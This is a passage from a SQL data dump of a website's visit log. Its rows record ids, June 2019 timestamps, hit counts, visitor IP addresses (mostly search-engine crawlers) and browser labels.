ther'),(427100,1560218956,1,1,0,0,'66.249.66.220','chrome'),(427101,1560219603,1,1,0,0,'178.154.244.11','other'),(427102,1560220413,1,1,0,0,'66.249.66.218','chrome'),(427103,1560220428,2,2,0,0,'66.249.66.220','chrome'),(427104,1560220891,1,1,0,0,'207.46.13.113','other'),(427105,1560221667,1,1,0,0,'66.249.66.218','chrome'),(427106,1560222343,1,1,0,0,'207.46.13.241','other'),(427107,1560222603,1,1,0,0,'40.77.167.50','other'),(427108,1560224173,2,2,0,0,'66.249.66.218','chrome'),(427109,1560224615,2,2,0,0,'8.29.198.25','other'),(427110,1560225136,1,1,0,0,'66.249.66.218','chrome'),(427111,1560225359,1,1,0,0,'207.46.13.241','other'),(427112,1560225751,1,1,0,0,'40.77.167.181','other'),(427113,1560225984,1,1,0,0,'66.249.66.222','chrome'),(427114,1560226480,1,1,0,0,'213.180.203.40','other'),(427115,1560226668,2,2,0,0,'40.77.167.50','other'),(427116,1560226870,1,1,0,0,'66.249.66.128','chrome'),(427117,1560226891,1,1,0,0,'66.249.66.222','chrome'),(427118,1560226934,2,2,0,0,'66.249.66.220','chrome'),(427119,1560227097,1,1,0,0,'193.106.30.98','chrome'),(427120,1560227184,1,1,0,0,'207.46.13.241','other'),(427121,1560227645,1,1,0,0,'207.46.13.113','other'),(427122,1560227678,1,1,0,0,'40.77.167.181','other'),(427123,1560227999,1,1,0,0,'178.154.244.11','other'),(427124,1560228572,1,1,0,0,'66.249.66.222','chrome'),(427125,1560229005,1,1,0,0,'207.46.13.241','other'),(427126,1560229220,1,1,0,0,'37.73.135.215','chrome'),(427127,1560230077,3,3,0,0,'66.249.66.222','chrome'),(427128,1560230318,3,3,0,0,'66.249.66.218','chrome'),(427129,1560230629,1,1,0,0,'5.45.207.79','other'),(427130,1560230778,1,1,0,0,'95.108.181.54','other'),(427131,1560230783,1,1,0,0,'66.249.66.220','chrome'),(427132,1560231127,1,1,0,0,'178.154.244.11','other'),(427133,1560231213,1,1,0,0,'185.255.112.112','other'),(427134,1560231317,1,1,0,0,'207.46.13.113','other'),(427135,1560231496,1,1,0,0,'207.46.13.241','other'),(427136,1560231884,2,2,0,0,'66.249.66.222','chrome'),(427137,1560232428,1,1,0,0,'40.77.167.181','other'),(427138,1560232795,2,2,0,0,'66.249.66.218','chrome'),(427139,1560232900,2,2,0,0,'66.249.66.222','chrome'),(427140,1560233876,1,1,0,0,'40.77.167.181','other'),(427141,1560235494,1,1,0,0,'8.29.198.26','other'),(427142,1560236081,2,2,0,0,'40.77.167.103','other'),(427143,1560236268,1,1,0,0,'8.29.198.27','other'),(427144,1560236309,1,1,0,0,'91.196.178.88','firefox'),(427145,1560236946,2,2,0,0,'66.249.66.222','chrome'),(427146,1560236993,1,1,0,0,'91.196.178.82','chrome'),(427147,1560237184,3,3,0,0,'176.9.9.94','other'),(427148,1560237232,2,2,0,0,'66.249.66.220','chrome'),(427149,1560239241,1,1,0,0,'40.77.167.108','other'),(427150,1560239469,1,1,0,0,'213.180.203.9','other'),(427151,1560239930,1,1,0,0,'66.249.66.218','chrome'),(427152,1560240163,1,1,0,0,'91.196.178.82','chrome'),(427153,1560240451,1,1,0,0,'5.45.207.19','other'),(427154,1560240903,1,1,0,0,'207.46.13.4','other'),(427155,1560241293,1,1,0,0,'52.162.161.148','other'),(427156,1560241298,1,1,0,0,'178.154.244.11','other'),(427157,1560241306,1,1,0,0,'66.249.66.132','chrome'),(427158,1560241313,1,1,0,0,'66.249.66.220','chrome'),(427159,1560241901,1,1,0,0,'66.249.66.218','chrome'),(427160,1560242394,1,1,0,0,'66.249.66.220','chrome'),(427161,1560242493,1,1,0,0,'66.249.66.222','chrome'),(427162,1560242865,1,1,0,0,'207.46.13.4','other'),(427163,1560242898,2,2,0,0,'95.108.213.4','other'),(427164,1560243681,2,2,0,0,'66.249.66.222','chrome'),(427165,1560244164,1,1,0,0,'13.66.139.0','other'),(427166,1560244370,1,1,0,0,'66.249.66.220','chrome'),(427167,1560244509,1,1,0,0,'66.249.66.81','chrome'),(427168,1560244680,1,1,0,0,'207.46.13.4','other'),(427169,1560244720,2,2,0,0,'157.55.39.196','other'),(427170,1560244797,1,1,0,0,'178.255.215.94','other'),(427171,1560245313,3,3,0,0,'66.249.66.218','chrome'),(427172,1560245492,1,1,0,0,'91.196.178.88','firefox'),(427173,1560246352,2,2,0,0,'8.29.198.25','other'),(427174,1560246430,1,1,0,0,'207.46.13.104','other'),(427175,1560246456,1,1,0,0,'66.249.66.136','chrome'),(427176,1560246465,1,1,0,0,'66.249.66.134','chrome'),(427177,1560246604,3,3,0,0,'66.249.66.220','chrome'),(427178,1560246814,1,1,0,0,'66.249.66.128','chrome'),(427179,1560246859,1,1,0,0,'66.249.66.82','chrome'),(427180,1560247075,2,2,0,0,'31.43.33.24','firefox'),(427181,1560247264,2,2,0,0,'66.249.66.218','chrome'),(427182,1560247306,1,1,0,0,'157.55.39.89','other'),(427183,1560247653,1,1,0,0,'178.154.244.11','other'),(427184,1560247829,1,1,0,0,'109.74.154.72','chrome'),(427185,1560248198,1,1,0,0,'66.249.66.218','chrome'),(427186,1560248365,1,1,0,0,'66.249.66.82','chrome'),(427187,1560248873,1,1,0,0,'46.201.167.45','chrome'),(427188,1560249074,1,1,0,0,'157.55.39.91','other'),(427189,1560249127,1,1,0,0,'66.249.66.218','chrome'),(427190,1560249432,1,1,0,0,'157.55.39.78','other'),(427191,1560249635,1,1,0,0,'46.243.220.21','chrome'),(427192,1560249883,1,1,0,0,'46.201.167.45','chrome'),(427193,1560250715,2,2,0,0,'66.249.66.81','chrome'),(427194,1560250789,1,1,0,0,'66.249.66.218','chrome'),(427195,1560250815,2,2,0,0,'66.249.66.222','chrome'),(427196,1560250884,1,1,0,0,'207.46.13.57','other'),(427197,1560251096,1,1,0,0,'66.249.66.220','chrome'),(427198,1560251478,1,1,0,0,'157.55.39.91','other'),(427199,1560252483,1,1,0,0,'66.249.66.220','chrome'),(427200,1560252630,1,1,0,0,'66.249.66.222','chrome'),(427201,1560252726,1,1,0,0,'66.249.66.218','chrome'),(427202,1560253530,1,1,0,0,'193.106.30.98','chrome'),(427203,1560253855,1,1,0,0,'66.249.66.222','chrome'),(427204,1560253866,2,2,0,0,'66.249.66.128','chrome'),(427205,1560254024,1,1,0,0,'157.55.39.91','other'),(427206,1560254144,1,1,0,0,'157.55.39.78','other'),(427207,1560255390,2,2,0,0,'66.249.66.220','chrome'),(427208,1560255593,1,1,0,0,'5.45.207.79','other'),(427209,1560255729,1,1,0,0,'178.154.244.11','other'),(427210,1560255795,2,2,0,0,'66.249.66.128','chrome'),(427211,1560255840,1,1,0,0,'66.249.66.222','chrome'),(427212,1560255850,1,1,0,0,'141.8.142.108','other'),(427213,1560255895,1,1,0,0,'91.196.178.82','chrome'),(427214,1560256276,1,1,0,0,'37.53.80.187','chrome'),(427215,1560256608,1,1,0,0,'5.45.207.79','other'),(427216,1560256809,1,1,0,0,'178.154.244.11','other'),(427217,1560257094,1,1,0,0,'130.180.210.143','chrome'),(427218,1560257203,1,1,0,0,'8.29.198.26','other'),(427219,1560257215,1,1,0,0,'91.209.11.236','other'),(427220,1560257370,45,45,0,0,'66.249.66.218','chrome'),(427221,1560257377,15,15,0,0,'66.249.66.220','chrome'),(427222,1560257403,7,7,0,0,'66.249.66.222','chrome'),(427223,1560257424,1,1,0,0,'207.46.13.218','other'),(427224,1560257525,2,2,0,0,'141.8.142.103','other'),(427226,1560257672,1,1,0,0,'66.249.66.200','chrome'),(427227,1560257757,4,4,0,0,'176.9.9.94','other'),(427228,1560257792,3,3,0,0,'66.249.66.198','chrome'),(427229,1560257794,3,3,0,0,'66.249.66.193','chrome'),(427230,1560257800,2,2,0,0,'66.249.66.196','chrome'),(427231,1560257968,1,1,0,0,'8.29.198.27','other'),(427232,1560257978,1,1,0,0,'66.249.66.130','chrome'),(427233,1560258315,1,1,0,0,'209.17.96.42','other'),(427234,1560258882,1,1,0,0,'157.55.39.136','other'),(427235,1560259008,1,1,0,0,'157.55.39.78','other'),(427236,1560259103,1,1,0,0,'66.249.66.222','chrome'),(427237,1560259405,1,1,0,0,'66.249.66.130','chrome'),(427238,1560259636,2,2,0,0,'66.249.66.218','chrome'),(427239,1560261286,2,2,0,0,'157.55.39.78','other'),(427240,1560261604,1,1,0,0,'66.249.66.222','chrome'),(427241,1560261779,2,2,0,0,'66.249.66.130','chrome'),(427242,1560261918,2,2,0,0,'66.249.66.218','chrome'),(427243,1560262513,1,1,0,0,'66.249.66.222','chrome'),(427244,1560262522,1,1,0,0,'66.249.66.220','chrome'),(427245,1560263056,1,1,0,0,'178.154.244.11','other'),(427246,1560263214,1,1,0,0,'37.9.113.20','other'),(427247,1560263244,1,1,0,0,'37.9.113.103','other'),(427248,1560263616,1,1,0,0,'207.46.13.218','other'),(427249,1560264094,1,1,0,0,'66.249.66.128','chrome'),(427250,1560266402,1,1,0,0,'87.250.224.47','other'),(427251,1560266654,1,1,0,0,'157.55.39.78','other'),(427252,1560267594,1,1,0,0,'178.154.244.11','other'),(427253,1560268060,1,1,0,0,'8.29.198.26','other'),(427254,1560268063,1,1,0,0,'207.46.13.218','other'),(427255,1560268133,1,1,0,0,'157.55.39.133','other'),(427256,1560268520,1,1,0,0,'66.249.66.218','chrome'),(427257,1560268697,1,1,0,0,'66.249.66.132','chrome'),(427258,1560268830,1,1,0,0,'8.29.198.25','other'),(427259,1560269200,1,1,0,0,'92.222.139.164','firefox'),(427260,1560269583,1,1,0,0,'66.249.66.130','chrome'),(427261,1560269846,1,1,0,0,'207.46.13.95','other'),(427262,1560270051,1,1,0,0,'66.249.66.218','chrome'),(427263,1560270054,1,1,0,0,'87.250.224.65','other'),(427264,1560270058,1,1,0,0,'178.154.244.65','other'),(427265,1560272433,1,1,0,0,'213.180.203.53','other'),(427266,1560272460,1,1,0,0,'157.55.39.83','other'),(427267,1560272703,1,1,0,0,'66.249.66.128','chrome'),(427268,1560273141,1,1,0,0,'141.8.183.11','other'),(427269,1560274267,2,2,0,0,'178.154.244.11','other'),(427270,1560274880,1,1,0,0,'157.55.39.9','other'),(427271,1560275027,2,2,0,0,'176.9.9.94','other'),(427272,1560276038,1,1,0,0,'91.196.178.170','chrome'),(427273,1560276246,1,1,0,0,'66.249.66.128','chrome'),(427274,1560276661,1,1,0,0,'93.72.69.30','chrome'),(427275,1560276877,2,2,0,0,'66.249.66.220','chrome'),(427276,1560277886,3,3,0,0,'207.46.13.94','other'),(427277,1560278906,3,3,0,0,'66.249.66.220','chrome'),(427278,1560278944,1,1,0,0,'8.29.198.27','other'),(427279,1560279104,1,1,0,0,'141.8.142.38','other'),(427280,1560279342,1,1,0,0,'213.180.203.53','other'),(427281,1560279495,1,1,0,0,'193.106.30.98','chrome'),(427282,1560279704,1,1,0,0,'8.29.198.26','other'),(427283,1560279804,1,1,0,0,'66.249.66.130','chrome'),(427284,1560279981,1,1,0,0,'66.249.66.222','chrome'),(427285,1560281136,1,1,0,0,'46.211.50.190','chrome'),(427286,1560281365,1,1,0,0,'157.55.39.9','other'),(427287,1560281862,2,2,0,0,'66.249.66.130','chrome'),(427288,1560282231,2,2,0,0,'66.249.66.218','chrome'),(427289,1560282429,1,1,0,0,'157.55.39.83','other'),(427290,1560283700,1,1,0,0,'207.46.13.97','other'),(427291,1560284237,1,1,0,0,'66.249.66.220','chrome'),(427292,1560284533,1,1,0,0,'40.77.167.16','other'),(427293,1560284598,1,1,0,0,'193.106.30.98','chrome'),(427294,1560284814,1,1,0,0,'66.249.66.222','chrome'),(427295,1560285746,1,1,0,0,'40.77.167.17','other'),(427296,1560285762,1,1,0,0,'5.45.207.79','other'),(427297,1560285906,1,1,0,0,'66.249.66.218','chrome'),(427298,1560287058,1,1,0,0,'207.46.13.206','other'),(427299,1560288929,1,1,0,0,'66.249.66.128','chrome'),(427300,1560289186,1,1,0,0,'66.249.66.130','chrome'),(427301,1560289277,1,1,0,0,'66.249.66.132','chrome'),(427302,1560289413,1,1,0,0,'46.243.220.21','chrome'),(427303,1560289813,1,1,0,0,'8.29.198.26','other'),(427304,1560289936,2,2,0,0,'207.46.13.99','other'),(427305,1560290190,1,1,0,0,'176.9.9.94','other'),(427306,1560290464,1,1,0,0,'66.249.66.218','chrome'),(427307,1560290559,1,1,0,0,'8.29.198.27','other'),(427308,1560290584,1,1,0,0,'66.249.66.220','chrome'),(427309,1560291874,1,1,0,0,'40.77.167.137','other'),(427310,1560291930,1,1,0,0,'40.77.167.17','other'),(427311,1560292032,1,1,0,0,'40.77.167.48','other'),(427312,1560292086,1,1,0,0,'66.249.66.222','chrome'),(427313,1560292443,1,1,0,0,'66.249.66.218','chrome'),(427314,1560293404,1,1,0,0,'178.154.244.11','other'),(427315,1560293983,1,1,0,0,'40.77.167.48','other'),(427316,1560293997,2,2,0,0,'207.46.13.206','other'),(427317,1560294026,1,1,0,0,'40.77.167.197','other'),(427318,1560295213,1,1,0,0,'66.249.66.218','chrome'),(427319,1560295692,1,1,0,0,'66.249.66.132','chrome'),(427320,1560296344,1,1,0,0,'66.249.66.222','chrome'),(427321,1560296469,1,1,0,0,'66.249.66.218','chrome'),(427322,1560296854,1,1,0,0,'66.249.66.130','chrome'),(427323,1560297609,1,1,0,0,'66.249.66.222','chrome'),(427324,1560298274,1,1,0,0,'13.66.139.0','other'),(427325,1560298824,1,1,0,0,'66.249.66.222','chrome'),(427326,1560300287,1,1,0,0,'66.249.66.222','chrome'),(427327,1560300553,1,1,0,0,'40.77.167.175','other'),(427328,1560300693,1,1,0,0,'8.29.198.25','other'),(427329,1560301413,1,1,0,0,'8.29.198.27','other'),(427330,1560302041,1,1,0,0,'66.249.66.218','chrome'),(427331,1560302733,1,1,0,0,'66.249.66.132','chrome'),(427332,1560303764,1,1,0,0,'66.249.66.220','chrome'),(427333,1560303820,1,1,0,0,'66.249.66.218','chrome'),(427334,1560304061,2,2,0,0,'207.46.13.171','other'),(427335,1560304087,1,1,0,0,'66.249.66.222','chrome'),(427336,1560304260,1,1,0,0,'207.46.13.44','other'),(427337,1560304323,2,2,0,0,'207.46.13.139','other'),(427338,1560304800,1,1,0,0,'176.9.9.94','other'),(427339,1560304810,1,1,0,0,'66.249.66.218','chrome'),(427340,1560305533,1,1,0,0,'207.46.13.139','other'),(427341,1560305543,1,1,0,0,'157.55.39.141','other'),(427342,1560305844,1,1,0,0,'66.249.66.220','chrome'),(427343,1560306412,1,1,0,0,'213.180.203.40','other'),(427344,1560306434,1,1,0,0,'207.46.13.176','other'),(427345,1560306888,1,1,0,0,'66.249.66.218','chrome'),(427346,1560307146,1,1,0,0,'193.106.30.98','chrome'),(427347,1560307707,1,1,0,0,'207.46.13.176','other'),(427348,1560308072,1,1,0,0,'66.249.66.220','chrome'),(427349,1560308459,1,1,0,0,'176.8.91.216','chrome'),(427350,1560308628,1,1,0,0,'91.209.11.236','other'),(427351,1560309017,1,1,0,0,'66.249.66.218','chrome'),(427352,1560309721,1,1,0,0,'207.46.13.171','other'),(427353,1560310461,1,1,0,0,'66.249.66.220','chrome'),(427354,1560310728,1,1,0,0,'207.46.13.58','other'),(427355,1560310832,1,1,0,0,'87.250.224.47','other'),(427356,1560310869,1,1,0,0,'207.46.13.139','other'),(427357,1560311549,2,2,0,0,'8.29.198.25','other'),(427358,1560311837,1,1,0,0,'66.249.66.218','chrome'),(427359,1560311958,2,2,0,0,'66.249.66.220','chrome'),(427360,1560312528,1,1,0,0,'40.77.167.111','other'),(427361,1560312765,1,1,0,0,'207.46.13.58','other'),(427362,1560313727,1,1,0,0,'207.46.13.139','other'),(427363,1560313797,1,1,0,0,'180.76.15.142','other'),(427364,1560314111,1,1,0,0,'66.249.66.218','chrome'),(427365,1560315267,2,2,0,0,'66.249.66.222','chrome'),(427366,1560316039,2,2,0,0,'66.249.66.218','chrome'),(427367,1560316669,1,1,0,0,'91.196.178.93','chrome'),(427368,1560316873,1,1,0,0,'178.154.244.11','other'),(427369,1560317159,1,1,0,0,'207.46.13.139','other'),(427370,1560317167,1,1,0,0,'5.45.207.19','other'),(427371,1560317292,1,1,0,0,'91.196.177.46','chrome'),(427372,1560317644,1,1,0,0,'66.249.66.220','chrome'),(427373,1560317839,1,1,0,0,'66.249.66.218','chrome'),(427374,1560317988,1,1,0,0,'91.196.178.82','chrome'),(427375,1560318072,1,1,0,0,'66.249.66.222','chrome'),(427376,1560318756,1,1,0,0,'66.249.66.218','chrome'),(427377,1560319707,3,3,0,0,'66.249.66.220','chrome'),(427378,1560319897,1,1,0,0,'66.249.66.222','chrome'),(427379,1560320087,1,1,0,0,'207.46.13.139','other'),(427380,1560320452,1,1,0,0,'95.108.213.4','other'),(427381,1560320635,1,1,0,0,'207.46.13.58','other'),(427382,1560321012,2,2,0,0,'66.249.66.220','chrome'),(427383,1560321108,2,2,0,0,'66.249.66.218','chrome'),(427384,1560321154,1,1,0,0,'66.249.66.222','chrome'),(427385,1560322268,1,1,0,0,'207.46.13.171','other'),(427386,1560322384,1,1,0,0,'95.132.25.122','firefox'),(427387,1560322396,1,1,0,0,'8.29.198.25','other'),(427388,1560322416,1,1,0,0,'207.46.13.58','other'),(427389,1560322506,1,1,0,0,'66.249.66.128','chrome'),(427390,1560322562,2,2,0,0,'66.249.66.218','chrome'),(427391,1560323077,2,2,0,0,'66.249.66.220','chrome'),(427392,1560323087,1,1,0,0,'91.196.178.97','chrome'),(427393,1560323101,1,1,0,0,'8.29.198.26','other'),(427394,1560323390,1,1,0,0,'207.46.13.139','other'),(427395,1560323657,1,1,0,0,'66.249.66.130','chrome'),(427396,1560323745,1,1,0,0,'207.46.13.58','other'),(427397,1560324463,1,1,0,0,'207.46.13.171','other'),(427398,1560324528,1,1,0,0,'66.249.66.220','chrome'),(427399,1560325067,2,2,0,0,'66.249.66.128','chrome'),(427400,1560325517,1,1,0,0,'207.46.13.171','other'),(427401,1560325671,1,1,0,0,'40.77.167.34','other'),(427402,1560325812,1,1,0,0,'66.249.66.218','chrome'),(427403,1560326159,2,2,0,0,'66.249.66.222','chrome'),(427404,1560326596,1,1,0,0,'91.196.178.175','chrome'),(427405,1560326725,1,1,0,0,'40.77.167.34','other'),(427406,1560326986,1,1,0,0,'207.46.13.178','other'),(427407,1560327323,1,1,0,0,'5.45.207.79','other'),(427408,1560327371,1,1,0,0,'207.46.13.171','other'),(427409,1560327460,1,1,0,0,'91.196.179.33','chrome'),(427410,1560327570,2,2,0,0,'66.249.66.220','chrome'),(427411,1560328314,1,1,0,0,'77.52.189.210','chrome'),(427412,1560328348,1,1,0,0,'91.196.177.118','chrome'),(427413,1560328383,1,1,0,0,'207.46.13.171','other'),(427414,1560328427,1,1,0,0,'66.249.66.130','chrome'),(427415,1560329070,3,3,0,0,'66.249.66.218','chrome'),(427416,1560329885,1,1,0,0,'40.77.167.34','other'),(427417,1560332454,1,1,0,0,'66.249.66.132','chrome'),(427418,1560332886,1,1,0,0,'207.46.13.58','other'),(427419,1560333000,2,2,0,0,'40.77.167.34','other'),(427420,1560333154,1,1,0,0,'91.196.178.82','chrome'),(427421,1560333246,2,2,0,0,'8.29.198.26','other'),(427422,1560333483,1,1,0,0,'66.249.66.222','chrome'),(427423,1560333565,1,1,0,0,'207.46.13.70','other'),(427424,1560334250,1,1,0,0,'66.249.66.218','chrome'),(427425,1560334514,1,1,0,0,'178.255.215.94','other'),(427426,1560334591,1,1,0,0,'109.74.154.72','chrome'),(427427,1560334856,1,1,0,0,'66.249.66.222','chrome'),(427428,1560335403,1,1,0,0,'66.249.66.130','chrome'),(427429,1560335640,1,1,0,0,'40.77.167.37','other'),(427430,1560335749,1,1,0,0,'66.249.66.132','chrome'),(427431,1560335877,2,2,0,0,'95.213.141.126','opera'),(427432,1560336743,1,1,0,0,'130.180.220.246','chrome'),(427433,1560336792,1,1,0,0,'40.77.167.37','other'),(427434,1560336899,2,2,0,0,'178.154.244.11','other'),(427435,1560337202,2,2,0,0,'66.249.66.220','chrome'),(427436,1560337356,1,1,0,0,'46.201.60.115','opera'),(427437,1560337541,1,1,0,0,'180.76.15.24','other'),(427438,1560337572,1,1,0,0,'66.249.66.218','chrome'),(427439,1560337645,2,2,0,0,'35.226.62.82','chrome'),(427440,1560337697,3,3,0,0,'35.188.7.178','chrome'),(427441,1560337723,3,3,0,0,'130.211.229.232','chrome'),(427442,1560337731,1,1,0,0,'40.77.167.37','other'),(427443,1560338634,1,1,0,0,'207.46.13.70','other'),(427444,1560338720,2,2,0,0,'66.249.66.222','chrome'),(427445,1560339105,2,2,0,0,'66.249.66.218','chrome'),(427446,1560339402,1,1,0,0,'66.249.66.130','chrome'),(427447,1560339636,1,1,0,0,'91.196.178.82','chrome'),(427448,1560340685,1,1,0,0,'66.249.66.222','chrome'),(427449,1560341346,2,2,0,0,'66.249.66.218','chrome'),(427450,1560341673,1,1,0,0,'66.249.66.222','chrome'),(427451,1560341771,2,2,0,0,'104.236.240.178','chrome'),(427452,1560341867,1,1,0,0,'130.180.209.182','firefox'),(427453,1560342476,1,1,0,0,'66.249.66.130','chrome'),(427454,1560342561,1,1,0,0,'66.249.66.220','chrome'),(427455,1560342661,1,1,0,0,'66.249.66.218','chrome'),(427456,1560343233,1,1,0,0,'91.209.11.236','other'),(427457,1560343379,2,2,0,0,'166.62.89.97','chrome'),(427458,1560343410,1,1,0,0,'40.77.167.37','other'),(427459,1560343452,1,1,0,0,'66.249.66.222','chrome'),(427460,1560343483,1,1,0,0,'66.249.66.128','chrome'),(427461,1560343494,2,2,0,0,'103.11.74.5','chrome'),(427462,1560343629,2,2,0,0,'40.77.167.34','other'),(427463,1560343873,1,1,0,0,'91.196.178.82','chrome'),(427464,1560344100,1,1,0,0,'8.29.198.27','other'),(427465,1560344511,1,1,0,0,'66.249.66.222','chrome'),(427466,1560344665,1,1,0,0,'194.37.248.11','chrome'),(427467,1560344818,1,1,0,0,'8.29.198.26','other'),(427468,1560344926,1,1,0,0,'207.46.13.70','other'),(427469,1560344976,1,1,0,0,'40.77.167.99','other'),(427470,1560345191,2,2,0,0,'66.249.66.132','chrome'),(427471,1560345225,1,1,0,0,'46.201.60.115','opera'),(427472,1560345254,1,1,0,0,'81.88.49.44','chrome'),(427473,1560345257,1,1,0,0,'81.88.49.3','chrome'),(427474,1560345503,1,1,0,0,'66.249.66.218','chrome'),(427475,1560345856,1,1,0,0,'207.46.13.70','other'),(427476,1560346180,1,1,0,0,'91.196.178.82','chrome'),(427477,1560346292,1,1,0,0,'66.249.66.220','chrome'),(427478,1560346315,1,1,0,0,'91.196.177.118','chrome'),(427479,1560346381,1,1,0,0,'91.196.179.33','chrome'),(427480,1560346453,1,1,0,0,'66.249.66.218','chrome'),(427481,1560346599,1,1,0,0,'66.249.66.222','chrome'),(427482,1560346816,1,1,0,0,'77.52.189.210','chrome'),(427483,1560347091,2,2,0,0,'91.196.177.15','chrome'),(427484,1560348132,1,1,0,0,'66.249.66.130','chrome'),(427485,1560348338,1,1,0,0,'66.249.66.132','chrome'),(427486,1560348364,2,2,0,0,'79.137.68.203','chrome'),(427487,1560348435,1,1,0,0,'195.128.17.206','other'),(427488,1560349019,1,1,0,0,'176.9.9.94','other'),(427489,1560349249,3,3,0,0,'66.249.66.220','chrome'),(427490,1560349440,2,2,0,0,'178.154.244.11','other'),(427491,1560349870,2,2,0,0,'66.249.66.218','chrome'),(427492,1560351009,3,3,0,0,'66.249.66.222','chrome'),(427493,1560351218,1,1,0,0,'66.249.66.218','chrome'),(427494,1560351252,1,1,0,0,'66.249.66.128','chrome'),(427495,1560351281,1,1,0,0,'207.46.13.70','other'),(427496,1560351296,1,1,0,0,'66.249.66.130','chrome'),(427497,1560351341,1,1,0,0,'66.249.66.220','chrome'),(427498,1560352243,2,2,0,0,'157.55.39.243','other'),(427499,1560352405,1,1,0,0,'40.77.167.99','other'),(427500,1560352839,1,1,0,0,'5.45.207.19','other'),(427501,1560353065,2,2,0,0,'103.11.74.5','chrome'),(427502,1560353559,3,3,0,0,'66.249.66.222','chrome'),(427503,1560353703,1,1,0,0,'157.55.39.243','other'),(427504,1560354134,1,1,0,0,'207.46.13.70','other'),(427505,1560354587,1,1,0,0,'66.249.66.218','chrome'),(427506,1560354982,2,2,0,0,'8.29.198.26','other'),(427507,1560355215,2,2,0,0,'37.55.56.65','chrome'),(427508,1560356072,2,2,0,0,'40.77.167.99','other'),(427509,1560356206,1,1,0,0,'66.249.66.220','chrome'),(427510,1560356390,1,1,0,0,'31.170.123.71','chrome'),(427511,1560356805,1,1,0,0,'193.106.30.98','chrome'),(427512,1560358071,1,1,0,0,'157.55.39.243','other'),(427513,1560359116,1,1,0,0,'157.55.39.243','other'),(427514,1560359239,1,1,0,0,'157.55.39.150','other'),(427515,1560359246,1,1,0,0,'207.46.13.8','other'),(427516,1560359352,1,1,0,0,'157.55.39.121','other'),(427517,1560359644,1,1,0,0,'91.196.178.89','chrome'),(427518,1560359778,1,1,0,0,'51.15.43.133','chrome'),(427519,1560361148,3,3,0,0,'157.55.39.243','other'),(427520,1560361448,2,2,0,0,'157.55.39.121','other'),(427521,1560362020,1,1,0,0,'13.66.139.0','other'),(427522,1560362710,2,2,0,0,'185.105.208.19','chrome'),(427523,1560362722,3,3,0,0,'157.55.39.243','other'),(427524,1560362726,4,4,0,0,'207.46.13.207','other'),(427525,1560362732,1,1,0,0,'157.55.39.121','other'),(427526,1560362737,3,3,0,0,'207.46.13.8','other'),(427527,1560363223,1,1,0,0,'180.76.15.14','other'),(427528,1560363401,1,1,0,0,'91.196.178.83','chrome'),(427529,1560363584,2,2,0,0,'178.92.157.20','other'),(427530,1560363689,9,9,0,0,'157.55.39.121','other'),(427531,1560363696,1,1,0,0,'207.46.13.8','other'),(427532,1560363706,1,1,0,0,'157.55.39.243','other'),(427533,1560364468,2,2,0,0,'37.60.232.98','chrome'),(427534,1560364811,2,2,0,0,'176.9.9.94','other'),(427535,1560364907,1,1,0,0,'207.46.13.125','other'),(427536,1560365389,1,1,0,0,'207.46.13.188','other'),(427537,1560365779,1,1,0,0,'5.45.207.79','other'),(427538,1560365854,1,1,0,0,'8.29.198.27','other'),(427539,1560366090,1,1,0,0,'46.211.111.132','firefox'),(427540,1560366328,1,1,0,0,'207.46.13.188','other'),(427541,1560366417,1,1,0,0,'13.66.139.0','other'),(427542,1560366528,1,1,0,0,'8.29.198.25','other'),(427543,1560366562,2,2,0,0,'103.224.80.3','chrome'),(427544,1560366737,1,1,0,0,'91.196.178.103','firefox'),(427545,1560366741,1,1,0,0,'157.55.39.121','other'),(427546,1560367128,1,1,0,0,'195.128.17.206','other'),(427547,1560367205,2,2,0,0,'207.46.13.125','other'),(427548,1560367867,1,1,0,0,'66.249.66.218','chrome'),(427549,1560368316,1,1,0,0,'207.46.13.64','other'),(427550,1560371412,1,1,0,0,'207.46.13.220','other'),(427551,1560371789,1,1,0,0,'37.9.113.20','other'),(427552,1560371905,1,1,0,0,'66.249.66.132','chrome'),(427553,1560372032,1,1,0,0,'81.171.75.163','chrome'),(427554,1560372093,2,2,0,0,'66.249.66.218','chrome'),(427555,1560373317,1,1,0,0,'207.46.13.64','other'),(427556,1560373551,1,1,0,0,'66.249.66.218','chrome'),(427557,1560373585,1,1,0,0,'66.249.66.220','chrome'),(427558,1560375025,1,1,0,0,'66.249.66.128','chrome'),(427559,1560376341,1,1,0,0,'66.249.66.132','chrome'),(427560,1560376592,2,2,0,0,'66.249.66.218','chrome'),(427561,1560376711,1,1,0,0,'8.29.198.26','other'),(427562,1560377371,1,1,0,0,'207.46.13.64','other'),(427563,1560377386,1,1,0,0,'8.29.198.27','other'),(427564,1560377505,1,1,0,0,'87.250.224.64','other'),(427565,1560378915,1,1,0,0,'207.46.13.63','other'),(427566,1560378945,5,5,0,0,'91.98.103.46','chrome'),(427567,1560378949,1,1,0,0,'40.77.167.168','other'),(427568,1560379072,1,1,0,0,'66.249.66.218','chrome'),(427569,1560379653,1,1,0,0,'157.55.39.68','other'),(427570,1560380198,1,1,0,0,'40.77.167.168','other'),(427571,1560380309,2,2,0,0,'192.145.239.34','chrome'),(427572,1560380401,1,1,0,0,'87.250.224.65','other'),(427573,1560382985,1,1,0,0,'95.108.181.57','other'),(427574,1560382988,1,1,0,0,'66.249.66.128','chrome'),(427575,1560383512,1,1,0,0,'37.9.113.20','other'),(427576,1560383553,1,1,0,0,'164.132.78.171','chrome'),(427577,1560383819,1,1,0,0,'66.249.66.132','chrome'),(427578,1560383946,1,1,0,0,'103.224.80.3','chrome'),(427579,1560384109,1,1,0,0,'178.255.215.94','other'),(427580,1560385072,1,1,0,0,'207.46.13.33','other'),(427581,1560385533,1,1,0,0,'157.55.39.100','other'),(427582,1560386169,1,1,0,0,'207.46.13.33','other'),(427583,1560386851,206,206,0,0,'144.76.120.197','other'),(427584,1560387061,1,1,0,0,'178.32.104.245','firefox'),(427585,1560387569,2,2,0,0,'8.29.198.26','other'),(427586,1560387577,1,1,0,0,'180.76.15.12','other'),(427587,1560387630,1,1,0,0,'66.249.66.222','chrome'),(427588,1560387770,1,1,0,0,'40.77.167.190','other'),(427589,1560387925,1,1,0,0,'5.45.207.79','other'),(427590,1560389760,1,1,0,0,'66.249.66.218','chrome'),(427591,1560389846,1,1,0,0,'157.55.39.113','other'),(427592,1560390072,1,1,0,0,'54.147.188.118','other'),(427593,1560390511,1,1,0,0,'37.9.113.148','other'),(427594,1560391151,1,1,0,0,'66.249.66.130','chrome'),(427595,1560391638,2,2,0,0,'157.55.39.149','other'),(427596,1560392415,1,1,0,0,'40.77.167.53','other'),(427597,1560393065,1,1,0,0,'81.88.49.9','chrome'),(427598,1560393070,1,1,0,0,'81.88.49.16','chrome'),(427599,1560393114,1,1,0,0,'66.249.66.218','chrome'),(427600,